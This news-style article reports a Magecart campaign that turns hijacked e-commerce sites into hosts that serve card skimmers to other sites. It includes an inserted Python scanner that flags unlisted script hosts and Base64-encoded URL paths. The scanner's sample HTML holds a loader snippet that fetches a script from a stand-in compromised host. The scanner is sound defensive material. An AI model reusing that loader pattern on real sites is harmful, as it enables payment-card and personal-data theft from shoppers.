A cybercriminal group under the Magecart umbrella has deployed a sophisticated attack on e-commerce sites in multiple countries, using them to host skimming malware that can steal credit card data and personally identifiable information (PII). In addition, the group has also been using the same infected sites to deliver malware to other target sites, which amplifies the danger of the campaign. The group behind the attack, which researchers from Akamai recently spotted, has already affected an unknown number of people across the US, UK, Brazil, Spain, Estonia, Australia, and Peru.
Magecart is a collective of cybercriminal organizations notorious for compromising thousands of websites around the world, including major businesses such as TicketMaster and British Airways. These groups inject malware into legitimate e-commerce sites, either by exploiting vulnerabilities or by taking over third-party components; the malware then intercepts data submitted through the website and sends it to a remote server for monetization. Last year, Akamai recorded Magecart attacks on 9,200 e-commerce sites, with 2,468 still infected by the end of 2020.
However, the latest campaign is distinct from other attacks by Magecart, as the group is not only injecting malware into target sites but also hijacking them to deliver malicious code. By using legitimate domains, the attackers gain the inherent trust built by the domains over time, increasing the chance of their activities going undetected. This campaign is also unusual in that the attackers are targeting a range of software, including Magento, WooCommerce, Shopify, and WordPress.
The attack’s infrastructure is highly sophisticated, featuring several tricks that disguise the malicious activity. Instead of injecting a skimmer directly into a target website, the attacker inserts small JavaScript code snippets into its web pages that later fetch the malicious skimmer from a host website. The JavaScript that the attacker uses resembles the loader code of Google Tag Manager and other legitimate third-party services. The attacker also incorporates Base64 encoding into the URLs of infected websites to obfuscate the activity further.
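A defender-side check for the loader pattern described above, added here as an example and not taken from Akamai's report or from the campaign's own code: it scans a page's HTML for script loads from hosts outside an allowlist and for Base64-like URL path segments, the two traits the article names. The allowlist hosts and the sample HTML are constructed for this example.

```python
import base64
import re
from urllib.parse import urlparse

# Hosts this shop legitimately loads scripts from (assumed allowlist, constructed).
ALLOWED_SCRIPT_HOSTS = {"www.googletagmanager.com", "shop.example.test"}

SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.I)
# Inline <script> bodies (no src attribute).
INLINE_SCRIPT_RE = re.compile(r'<script(?![^>]*\ssrc=)[^>]*>(.*?)</script>', re.I | re.S)
# Tag-manager-style loaders build a <script> element at runtime.
INLINE_LOADER_RE = re.compile(r'createElement\(\s*["\']script["\']\s*\)', re.I)
INLINE_URL_RE = re.compile(r'https?://[^\s"\'<>]+')

def looks_base64(segment: str) -> bool:
    """True if a URL path segment decodes as Base64 to mostly printable text."""
    if len(segment) < 12 or not re.fullmatch(r'[A-Za-z0-9+/=_-]+', segment):
        return False
    try:
        raw = base64.b64decode(segment + "=" * (-len(segment) % 4), altchars=b"-_")
    except Exception:
        return False
    return bool(raw) and sum(32 <= b < 127 for b in raw) / len(raw) > 0.9

def audit_page(html: str) -> list:
    """Return (reason, url) findings for script loads a reviewer should look at."""
    urls = SCRIPT_SRC_RE.findall(html)
    for body in INLINE_SCRIPT_RE.findall(html):
        if INLINE_LOADER_RE.search(body):          # inline snippet that injects a script
            urls += INLINE_URL_RE.findall(body)
    findings = []
    for url in urls:
        parsed = urlparse(url)
        if (parsed.hostname or "") not in ALLOWED_SCRIPT_HOSTS:
            findings.append(("unlisted script host", url))
        if any(looks_base64(seg) for seg in parsed.path.split("/")):
            findings.append(("base64-like path segment", url))
    return findings

# Constructed sample: a legitimate tag-manager load plus a loader that fetches
# from a hypothetical compromised store with a Base64-encoded path segment.
SAMPLE_HTML = """
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script>
(function(d){var s=d.createElement('script');
s.src='https://compromised-store.example.test/aGVsbG8gd29ybGQgc2tpbW1lcg/loader.js';
d.head.appendChild(s);})(document);
</script>
"""

if __name__ == "__main__":
    for reason, url in audit_page(SAMPLE_HTML):
        print(f"{reason}: {url}")
```

Run against a crawled copy of each checkout page, this reports only the second loader, once for its unlisted host and once for the Base64-like segment; the allowlist is the part a site owner must maintain.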
Adding to the campaign’s sophistication, Akamai’s analysis found code in the skimmer malware that ensured the attackers did not steal the same credit card and personal information twice.
The attack has far-reaching implications for e-commerce sites, with tens of thousands of people potentially at risk of falling victim to this attack. Considering that Magecart has a track record of stealing millions of credit cards globally, it is crucial that all e-commerce sites, regardless of the software they use, strictly monitor their websites for malicious activity.
Magecart has become a significant problem for retailers worldwide, as the group consistently adapts and evolves its tactics. The latest campaign’s complexity and scale demonstrate the group’s continued willingness to develop and execute highly sophisticated attacks. As the cybercrime landscape evolves, it is now more critical than ever for businesses to implement robust security measures that can not just defend against existing attacks but anticipate and counter emerging threats.